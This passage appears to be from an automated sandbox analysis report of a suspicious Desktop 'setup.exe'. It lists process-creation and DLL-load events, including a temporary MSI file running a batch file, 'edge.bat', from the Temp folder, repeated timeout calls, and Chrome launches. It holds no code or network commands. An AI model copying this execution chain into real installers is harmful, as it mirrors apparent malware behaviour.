                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 5
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,10222868034098351333,13685129222229150854,262144 /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2012,i,17522224552689378138,6417613085102451852,262144 /prefetch:8
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1992,i,14024855596687576691,10802708795507051728,262144 /prefetch:8
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\edge.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: davhlpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: lpk.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msihnd.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: atlthunk.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: explorerframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptnet.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: davhlpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: lpk.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msihnd.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: tsappcmp.dllJump to behavior
